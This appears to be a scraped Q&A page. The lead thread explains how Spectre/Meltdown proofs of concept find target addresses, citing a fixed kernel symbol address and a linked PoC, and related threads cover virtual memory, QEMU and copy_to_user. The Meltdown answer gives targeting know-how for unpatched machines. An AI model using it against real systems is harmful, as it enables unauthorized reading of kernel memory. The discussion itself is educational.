As part of a learning project, I've worked a bit on Spectre and Meltdown PoCs to get myself more confortable with the concept. I have managed to recover previously accessed data using the clock timers, but now I'm wondering how do they actually read physical memory from that point.
Which leads to my question : in a lot of Spectre v1\v2 examples, you can read this piece of toy-code example:
if (x<y) {
z = array[x];
}
with x supposedly being equal to : attacked_adress - adress_of_array, which will effectively lead to z getting the value at attacked_adress.
In the example it's quite easy to understand, but in reality how do they even know what attacked_adress looks like ?
Is it a virtual address with an offset, or a physical address, and how do they manage to find where is the "important memory" located in the first place ?
In the example it's quite easy to understand, but in reality how do they even know what attacked_adress looks like ?
You are right, Spectre and Meltdown are just possibilities, not a ready-to-use attacks. If you know an address to attack from other sources, Spectre and Meltdown are the way to get the data even using a browser.
Is it a virtual address with an offset, or a physical address, and how do they manage to find where is the "important memory" located in the first place ?
Sure, it is a virtual address, since it is all happening in user space program. But prior to the recent kernel patches, we had a full kernel space mapped into each user space process. That was made to speedup system calls, i.e. do just a privilege context switch and not a process context switch for each syscall.
So, due to that design and Meltdown, it is possible to read kernel space from unprivileged user space application (for example, browser) on unpatched kernels.
In general, the easiest attack scenario is to target machines with old kernels, which does not use address randomization, i.e. kernel symbols are at the same place on any machine running the specific kernel version. Basically, we run specific kernel on a test machine, write down the "important memory addresses" and then just run the attack on a victims machine using those addresses.
Have a look at my Specter-Based Meltdown PoC (i.e. 2-in-1): https://github.com/berestovskyy/spectre-meltdown
It is much simpler and easier to understand than the original code from the Specre paper. And it has just 99 lines in C (including comments).
It uses the described above technique, i.e. for Linux 3.13 it simply tries to read the predefined address 0xffffffff81800040 which is linux_proc_banner symbol located in kernel space. It runs without any privileges on different machines with kernel 3.13 and successfully reads kernel space on each machine.
It is harmless, but just a tiny working PoC.
Related
I'm curious to know what "Memory" really stands for.
When I compile and execute this code:
#include <stdio.h>
int main(void)
{
int n = 50;
printf("%p\n", &n);
}
As we know, we get a Hex output like:
0x7ffeee63dabc
What does that Hex address physically stand for? Is it a part of my computer's L1 Cache? RAM? SSD?
Where can I read more about this, any references would be helpful. Thank you.
Some Background:
I've recently picked up learning Computer Science again after a break of a few years (I was working in the Industry as a low-code / no-code Web Developer) and realised there's a few gaps in my knowledge I want to colour in.
In learning C (via CS50x) I'm on the week of Memory. And I realise I don't actually know what Memory this is referring to. The course either assumes that the students already know this, or that it isn't pertinent to the context of this course (it's an Intro course so abstractions make sense to avoid going down rabbit holes), but I'm curious and I'd like to chase it down to find out the answers.
computer architecture 101
In your computer there is a CPU chip and there are RAM chips.
The CPU's job is to calculate things. The RAM's job is to remember things.
The CPU is in charge. When it wants to remember something, or look up something it's remembering, it asks the RAM.
The RAM has a bunch of slots where it can store things. Each slot holds 1 byte. The slot number (not the number in the slot, but the number of the slot) is called an address. Each slot has a different address. They start from 0 and go up: 0, 1, 2, 3, 4, ... Like letterboxes on a street, but starting from 0.
The way the CPU tells the RAM which thing to remember is by using a number called an address.
The CPU can say: "Put the number 126 into slot 73224." And it can say, "Which number is in slot 97221?"
We normally write slot numbers (addresses) in hexadecimal, with 0x in front to remind us that they're hexadecimal. It's tradition.
How does the CPU know which address it wants to access? Simple: the program tells it.
operating systems 101
An operating system's job is to keep the system running smoothly
That doesn't happen when faulty programs are allowed to access memory that doesn't belong to them.
So the operating system decides which memory the program is allowed to access, and which memory it isn't. It tells the CPU this information.
The "Am I allowed to access this memory?" information applies in 4 kilobyte chunks called "pages". Either you can access the entire page, or none of it. That's because if every byte had separate access information, you'd need to waste half your RAM just storing the access information!
If you try to access an address in a page that the OS said you can't access, the CPU narcs to the OS, which then stops running your program.
operating systems 102
Remember this shiny new "virtual memory" feature from the Windows 95 days?
"Virtual memory" means the addresses your program uses aren't the real RAM addresses.
Whenever you access an address, the CPU looks up the real address. This also uses pages. So the OS can make any "address page" go to any "real page".
These are not official terms - OS designers actually say that any "virtual page" can "map" to any "physical page".
If the OS wants a physical page but there aren't any left, it can pick one that's already used, save its data onto the disk, make a little note that it's on disk, and then it can reuse the page.
What if the program tries to access a page that's on disk? The OS lies to the CPU: it says "The program is not allowed to access this page." even though it is allowed.
When the CPU narcs to the OS, the OS doesn't stop the program. It pauses the program, finds something else to store on disk to make room, reads in the data for the page the program wants, then it unpauses the program and tells the CPU "actually, he's allowed to access this page now." Neat trick!
So that's virtual memory. The CPU doesn't know the difference between a page that's on disk, and one that's not allocated. Your program doesn't know the difference between a page that's on disk, and one that isn't. Your program just suffers a little hiccup when it has to get something from disk.
The only way to know whether a virtual page is actually stored in RAM (in a physical page), or whether it's on disk, is to ask the OS.
Virtual page numbers don't have to start from 0; the OS can choose any virtual page number it wants.
computer architecture 102
A cache is a little bit of memory in the CPU so it doesn't have to keep asking the RAM chip for things.
The first time the CPU wants to read from a certain address, it asks the RAM chip. Then, it chooses something to delete from its cache, deletes it, and puts the value it just read into the cache instead.
Whenever the CPU wants to read from a certain address, it checks if it's in the cache first.
Things that are in the cache are also in RAM. It's not one or the other.
The cache typically stores chunks of 64 bytes, called cache lines. Not pages!
There isn't a good way to know whether a cache line is stored in the cache or not. Even the OS doesn't know.
programming language design 101
C doesn't want you to know about all this stuff.
C is a set of rules about how you can and can't write programs. The people who design C don't want to have to explain all this stuff, so they make rules about what you can and can't do with pointers, and that's the end of it.
For example, the language doesn't know about virtual memory, because not all types of computers have virtual memory. Dishwashers or microwaves have no use for it and it would be a waste of money.
What does that Hex address physically stand for? Is it a part of my computer's L1 Cache? RAM? SSD?
The address 0x7ffeee63dabc means address 0xabc within virtual page 0x7ffeee63d. It might be on your SSD at the moment or in RAM; if you access it then it has to come into RAM. It might also be in cache at the moment but there's no good way to tell. The address doesn't change no matter where it goes to.
You should think of memory as an abstract mapping from addresses to values, nothing more.
Whether your actual hardware implements it as a single chunk of memory, or a complicated hierarchy of caches is not relevant, until you try to optimize for a very specific hardware, which you will not want to do 99% of the time.
In general memory is anything that is stored either temporarily or non-volatile. Temporary memory is lost when the machine is turned off and usually referred as RAM or simply "memory". Non volatile is kept in a hard disk, flash drive, EEPROM, etc. and usually referred as ROM or storage.
Caches are also a type of temporary memory, but they are referred just as cache and is not considered part of the RAM. The RAM on your PC is also referred as "physical memory" or "main memory".
When programming, all the variables are usually in main memory (more on this later) and brought to the caches (L1, L2, etc) when they are being used. But the caches are for the most part transparent for the app developers.
Now there is another thing to mention before I answer your question. The addresses of a program are not necessarily the addresses of the physical memory. The addresses are translated from "virtual addresses" to "physical addresses" by an MMU (memory protection unit) or similar CPU feature. The OS handles the MMU. The MMU is used for many reasons, two reasons are to hide and secure the OS memory and other apps memory from wrong memory accesses by a program. This way a program cannot access nor alter the OS or other program's memory.
Further, when there is not enough RAM to store all the memory that apps are requesting, the OS can store some of that memory in non volatile storage. Using virtual addresses, a program cannot easily know if the memory is actually in RAM or storage. This way programs can allocate a lot more memory than there is RAM. This is also why programs become very slow when they are consuming a lot of memory: it takes a long time to bring the data from storage back into main memory.
So, the address that you are printing is most likely the virtual address.
You can read something about those topics here:
https://en.wikipedia.org/wiki/Memory_management_(operating_systems)
https://en.wikipedia.org/wiki/Virtual_memory
Memory from the C standard point of view is the objects storage. How does it work and how it is organized is left to the implementation.
Even printing the pointers from the C point of view is pointless (it can be informative and interesting from the implementation point of view) and meaningless.
If your code is running under a modern operating system1, pointer values almost certainly correspond to virtual memory addresses, not physical addresses. There's a virtual memory system that maps the virtual address your code sees to a physical address in main memory (RAM), but as pages get swapped in and out that physical address may change.
For desktops, anything newer than the mid-'90s. For mainframes and minis, almost anything newer than the mid-'60s.
Is it a part of my computer's L1 Cache? RAM? SSD?
The short answer is RAM. This address is usually associated with a unique location inside your RAM. The long answer is, well - it depends!
Most machines today have a Memory Management Unit (MMU) which sits in-between the CPU and the peripherals attached to it, translating 'virtual' addresses seen by a program to real ones that actually refer to something physically attached to the bus. Setting up the MMU and allotting memory regions to your program is generally the job of the Operating System. This allows for cool stuff like sharing code/data with other running programs and more.
So the address that you see here may not be the actual physical address of a RAM location at all. However, with the help of the MMU, the OS can accurately and quickly map this number to an actual physical memory location somewhere in the RAM and allow you to store data in RAM.
Now, any accesses to the RAM may be cached in one or more of the available caches. Alternatively, it could happen that your program memory temporarily gets moved to disk (swapfile) to make space for another program. But all of this is completely automatic and transparent to the programmer. As far as your program is concerned, you are directly reading from or writing to the available RAM and the address is your handle to the unique location in RAM that you are accessing.
I'm modeling a particular evaluation board, which has a leon3 processor and several banks of MRAM mapped to specific addresses. My goal is to start qemu-system-sparc using my bootloader ELF, and then jump to the base address of a MRAM bank to begin executing bare-metal programs therein. To this end, I have been able to successfully run my bootloader and jump to the first instruction, but QEMU immediately stops and exits without reporting any error/trap. I can also run the bare-metal programs in isolation by passing them in ELF format as a kernel to qemu-system-sparc.
Short version: Is there a canonical way to set up a device such that code can be executed from it directly? What steps do I need to take when compiling that code to allow it to execute correctly?
I modeled the MRAM as a device with a MemoryRegion, along with the appropriate read and write operations to expose a heap-allocated array with my program. In my board code (modified version of qemu/hw/sparc/leon3.c), writes to the MRAM address are mapped to the MemoryRegion of the device. Using printfs, I am reporting reads and writes in the style of the unimplemented device (qemu/hw/misc/unimp.c), and I have verified that I am reading and writing to the device correctly.
Unfortunately, this did not work with respect to running the code on the device. I can see the read immediately after the bootloader jumps to the base address of my device, but the instruction read doesn't actually do anything. The bootloader uses a void function pointer, which is tied to the address of the MRAM device to induce a jump.
Another approach I tried is creating an alias to my device starting from address 0; I thought perhaps that my binary has all its addresses set relative to zero, so by mapping writes from addresses [0, MRAM_SIZE) as an alias to my device base address, the code will end up reading the corresponding instructions in the device MemoryRegion.
This approach failed an assert in memory.c:
static void memory_region_add_subregion_common(MemoryRegion *mr,
hwaddr offsset,
MemoryRegion *subregion)
{
assert(!subregion->container);
subregion->container = mr;
subregion->addr = offset;
memory_region_update_container_subregions(subregion);
}
What do I need to do to coerce QEMU to execute the code in my MRAM device? Do I need to produce a binary with absolute addresses?
Older versions of QEMU were simply unable to handle execution from anything other than RAM or ROM, and attempting to do so would give a "qemu: fatal: Trying to execute code outside RAM or ROM" error. QEMU 3.1 and later fixed this limitation, and now can execute code from anywhere -- though execution from a device will be much much slower than executing from RAM.
You mention that you "modeled the MRAM as a device with a MemoryRegion, along with the appropriate read and write operations to expose a heap-allocated array". This sounds like it is probably the wrong approach -- it will work but be very slow. If the MRAM appears to the guest as being like RAM, then model it as RAM (ie with a RAM MemoryRegion). If it's like RAM for reading but writes need to do something other than just-write-to-the-memory (or need to do that some of the time), then model it using a "romd" region, the same way the existing pflash devices do. Nonetheless, modelling it as a device with pure read and write functions should work, it'll just be horribly slow.
The assertion you've run into is the one that says "you can't put a memory region into two things at once" -- the 'subregion' you've passed in is already being used somewhere else, but you've tried to put it into a second container. If you have a MemoryRegion that you need to have appear in two places in the physical memory map, then you need to: create the MemoryRegion; create an alias MemoryRegion that aliases the real one; map the actual MemoryRegion into one place; map the alias into the other. There are plenty of examples of this in existing board models in QEMU.
More generally, you need to figure out what the evaluation board hardware actually is, and then model that. If the eval board has the MRAM visible at multiple physical addresses, then yes, use an alias MR. If it doesn't, then the problem is somewhere else and you need to figure out what's actually happening, not try to bodge around it with aliases that don't exist on the real hardware. QEMU's debug logging (various -d suboptions, plus -D file to log to a file) can be useful for checking what the emulated CPU is really doing in this early bootup phase -- but watch out as the logs can be quite large and they are sometimes tricky to interpret unless you know a little about QEMU internals.
The following is an excerpt from my simple driver code.
int vprobe_ioctl( struct file *filep, unsigned int cmd, void *UserInp)
{
case IOCTL_GET_MAX_PORTS:
*(int*)UserInp = TotalPorts;
#if ENABLED_DEBUG
printk("Available port :%u \n ", TotalPorts);
#endif
break;
}
I was not aware about the function copy_to_user which should be used while writing on user space memory. The code directly accesses the user address. But still I am not getting any kernel crash in my development system(x86_64 architecture). It works as expected.
But sometimes I could see kernel crash when I insert the .ko file in some other x86_64 machines. So, I replaced direct accessing with copy_to_user, and it works.
Could anyone please explain,
i) How direct accessing of user address works?
ii) Why am I seeing kernel crash in some systems whereas it works well in some other systems. Is there any kernel configuration mismatch between the systems because of which the kernel could access the user process's virtual address directly?
Note : All the systems I have used have same OS and kernel.-same image generated thru kickstart. - There is no possibility of any differences.
Thanks in advance.
would be interesting to see the crash. now what I'm saying is an assumption based on my knowledge about how the memory works.
user space memory is virtual. it means that the specific process address X is now located on some physical memory, this physical memory is a memory page that is currently allocated to your process. copy to user first checks that the memory given really belongs to the process and other security checks. beside that there is mapping issues.
the kernel memory has its own address space that need to map virtual to physical address. the kernel use the help of mmu (this is different per architecture). In x86 the mapping between the kernel virtual and user virtual is 1:1 (there are different issues here). In other system this is not always true.
I was reading a paragraph from the "The Linux Kernel Module Programming Guide" and I have a couple of doubts related to the following paragraph.
The reason for copy_from_user or get_user is that Linux memory (on
Intel architecture, it may be different under some other processors)
is segmented. This means that a pointer, by itself, does not reference
a unique location in memory, only a location in a memory segment, and
you need to know which memory segment it is to be able to use it.
There is one memory segment for the kernel, and one for each of the
processes.
However it is my understanding that Linux uses paging instead of segmentation and that virtual addresses at and above 0xc0000000 have the kernel mapping in.
Do we use copy_from_user in order to accommodate older kernels?
Do the current linux kernels use segmentation in any way at all? If so how?
If (1) is not true, are there any other advantages to using copy_from_user?
Yeah. I don't like that explanation either. The details are essentially correct in a technical sense (see also Why does Linux on x86 use different segments for user processes and the kernel?) but as you say, linux typically maps the memory so that kernel code could access it directly, so I don't think it's a good explanation for why copy_from_user, etc. actually exist.
IMO, the primary reason for using copy_from_user / copy_to_user (and friends) is simply that there are a number of things to be checked (dangers to be guarded against), and it makes sense to put all of those checks in one place. You wouldn't want every place that needs to copy data in and out from user-space to have to re-implement all those checks. Especially when the details may vary from one architecture to the next.
For example, it's possible that a user-space page is actually not present when you need to copy to or from that memory and hence it's important that the call be made from a context that can accommodate a page fault (and hence being put to sleep).
Also, user-space data pointers need to be checked carefully to ensure that they actually point to user-space and that they point to data regions, and that the copy length doesn't wrap beyond the end of the valid regions, and so forth.
Finally, it's possible that user-space actually doesn't share the same page mappings with the kernel. There used to be a linux patch for 32-bit x86 that made the complete 4G of virtual address space available to user-space processes. In that case, kernel code could not make the assumption that a user-space pointer was directly accessible, and those functions might need to map individual user-space pages one at a time in order to access them. (See 4GB/4GB Kernel VM Split)
I am currently taking a course in Operating Systems and I came across address virtualization. I will give a brief about what I know and follow that with my question.
Basically, the CPU(modern microprocessors) generates virtual addresses and then an MMU(memory management unit) takes care of translating those virtual address to their corresponding physical addresses in the RAM. The example that was given by the professor is there is a need for virtualization because say for example: You compile a C program. You run it. And then you compile another C program. You try to run it but the resident running program in memory prevents loading a newer program even when space is available.
From my understanding, I think having no virtualization, if the compiler generates two physical addresses that are the same, the second won't run because it thinks there isn't enough space for it. When we virtualize this, as in the CPU generates only virtual addresses, the MMU will deal with this "collision" and find a spot for the other program in RAM.(Our professor gave the example of the MMU being a mapping table, that takes a virtual address and maps it to a physical address). I thought of that idea to be very similar to say resolving collisions in a hash table.
Could I please get some input on my understanding and any further clarification is appreciated.
Could I please get some input on my understanding and any further clarification is appreciated.
Your understanding is roughly correct.
Clarifications:
The data structures are nothing like a hash table.
If anything, the data structures are closer to a BTree, but even there are important differences with that as well. It is really closest to a (Java) N-dimensional array which has been sparsely allocated.
It is mapping pages rather than complete virtual / physical addresses. (A complete address is a page address + an offset within the page.).
There is no issue with collision. At any point in time, the virtual -> physical mappings for all users / processes give a one-to-one mapping from (process id + virtual page) to a either a physical RAM page or a disk page (or both).
The reasons we use virtual memory are:
process isolation; i.e. one process can't see or interfere with another processes memory
simplifying application writing; i.e. each process thinks it has a contiguous set off memory addresses, and the same set each time. (To a first approximation ...)
simplifying compilation, linking, loading; i.e. the compilers, etc there is no need to "relocate" code at compile time or run time to take into account other.
to allow the system to accommodate more processes than it has physical RAM for ... though this comes with potential risks and performance penalties.
I think you have a fundamental misconception about what goes on in an operating system in regard to memory.
(1) You are describing logical memory, not virtual memory. Virtual memory refers to the use of disk storage to simulate memory. Unmapped pages of logical memory get mapped to disk space.
Sadly, the terms logical memory and virtual memory get conflated but they are distinct concepts the the distinction is becoming increasingly important.
(2) Programs run in a PROCESS. A process only runs one program at a time (in unix each process generally only runs one program (two if you count the cloned caller) in its life.
In modern systems each process process gets a logical address space (sequential addresses) that can be mapped to physical locations or no location at all. Generally, part of that logical address space is mapped to a kernel area that is shared by all processes. The logical address space is create with the process. No address space—no process.
In a 32-bit system, addresses 0-7FFFFFFF might be user address that are (generally) mapped to unique physical locations while 80000000-FFFFFFFFmight be mapped to a system address space that is the same for all processes.
(3) Logical memory management primarily serves as a means of security; not as a means for program loading (although it does help in that regard).
(4) This example makes no sense to me:
You compile a C program. You run it. And then you compile another C program. You try to run it but the resident running program in memory prevents loading a newer program even when space is available.
You are ignoring the concept of a PROCESS. A process can only have one program running at a time. In systems that do permit serial running of programs with the same process (e.g., VMS) the executing program prevents loading another program (or the loading of another program causes the termination of the running program). It is not a memory issue.
(5) This is not correct at all:
From my understanding, I think having no virtualization, if the compiler generates two physical addresses that are the same, the second won't run because it thinks there isn't enough space for it. When we virtualize this, as in the CPU generates only virtual addresses, the MMU will deal with this "collision" and find a spot for the other program in RAM.
The MMU does not deal with collisions. The operating system sets up tables that define the logical address space when the process start. Logical memory has nothing to do with hash tables.
When a program accesses logical memory the rough sequence is:
Break down the address into a page and an offset within the page.
Does the page have an corresponding entry in the page table? If not FAULT.
Is the entry in the page table valid? If not FAULT.
Does the page table entry allow the type of access (read/write/execute) requested in the current operating mode (kernel/user/...)? If not FAULT.
Does the entry map to a physical page? If not PAGE FAULT (go load the page from disk--virtual memory––and try again).
Access the physical memory referenced by the page table.